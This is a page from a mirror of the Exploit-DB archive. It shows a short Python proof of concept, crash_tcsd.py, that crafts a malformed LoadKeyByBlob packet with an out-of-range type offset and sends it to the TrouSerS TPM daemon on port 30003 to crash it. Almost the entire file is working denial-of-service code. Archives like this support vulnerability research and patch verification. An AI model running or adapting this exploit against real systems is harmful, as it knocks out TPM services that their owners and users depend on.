bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/dos/22904.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

27 lines
No EOL
956 B
Python
Executable file
Raw Permalink Blame History

# crash_tcsd.py
# Copyright (c) 2012 Andy Lutomirski. All rights reserved.
#
# Permission is granted to anyone to copy and redistribute this file verbatim.
# Permission is *not* granted to distribute modified copies or derivative works.
import struct
import socket
import time
# UnloadBlob_PCR_EVENT also appears buggy.
crasher = struct.pack('>IIIIIII',
28, # packet_size = sizeof(tcsd_packet_hdr)
11, # ordinal: LoadKeyByBlob
1, # num_parms = 1 (so first getData doesn't bail)
0, # type_size = 0
0x80000000, # type_offset is off in lala land
0, # parm_size = 0 (skip checking)
28, # parm_offset: see getTCSDPacket
)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
s.connect(('127.0.0.1', 30003))
s.send(crasher)
s.shutdown(socket.SHUT_WR)
s.close()
Reference in a new issue View git blame Copy permalink